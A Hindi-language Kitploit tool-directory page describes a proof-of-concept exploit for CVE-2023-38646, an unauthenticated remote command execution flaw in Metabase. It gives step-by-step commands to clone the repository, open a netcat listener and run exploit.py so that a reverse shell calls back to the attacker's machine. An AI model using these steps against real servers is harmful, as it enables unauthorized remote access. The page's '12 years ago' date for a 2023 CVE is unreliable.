Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38646 — यह Metabase, एक ओपन-सोर्स बिजनेस इंटेलिजेंस और डेटा एनालिटिक्स टूल का शोषण करने के लिए एक Proof of Concept (PoC) स्क्रिप्ट है। | Kitploit
उपकरण/GitHubGitHub/threathntr/cve-2023-38646
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

यह Metabase, एक ओपन-सोर्स बिजनेस इंटेलिजेंस और डेटा एनालिटिक्स टूल का शोषण करने के लिए एक Proof of Concept (PoC) स्क्रिप्ट है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-38646 PoC

विवरण

यह एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट है जो Metabase का शोषण करने के लिए है, जो एक ओपन-सोर्स बिजनेस इंटेलिजेंस और डेटा एनालिटिक्स टूल है। Metabase उपयोगकर्ताओं को अपने डेटा को विज़ुअलाइज़ और इंटरैक्ट करने की अनुमति देता है, जो इसे डेटा विश्लेषण के लिए एक शक्तिशाली प्लेटफॉर्म बनाता है।

यह भेद्यता, जिसे CVE-2023-38646 के रूप में नामित किया गया है, हमलावरों को बिना किसी प्रमाणीकरण की आवश्यकता के सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है। इस दोष का प्रभाव गंभीर था, क्योंकि इसने सर्वर के विशेषाधिकार स्तर पर सर्वर तक अनधिकृत पहुंच प्रदान की।

प्रूफ ऑफ कॉन्सेप्ट (PoC) चरण

इस रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/threatHNTR/CVE-2023-38646.git

रिपॉजिटरी में जाएं

root@kitploit:~
cd CVE-2023-38646

स्क्रिप्ट चलाने से पहले, एक Netcat लिसनर सेट अप करें

root@kitploit:~
nc -nlvp chosen-port

स्क्रिप्ट चलाएं

root@kitploit:~
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

शोषण: स्क्रिप्ट लक्ष्य Metabase सर्वर पर एक रिवर्स शेल भेजने का प्रयास करेगी। सफल होने पर, आपको अपनी मशीन पर एक शेल प्राप्त होगा। विभिन्न रिवर्स शेल आज़माने के लिए पेलोड बदलने में संकोच न करें।

संदर्भ

  • GitHub एडवाइज़री: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Metabase एडवाइज़री: https://www.metabase.com/blog/security-advisory

  • Metabase GitHub: https://github.com/metabase/metabase

  • Assetnote ब्लॉग - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

टूल डाउनलोड करें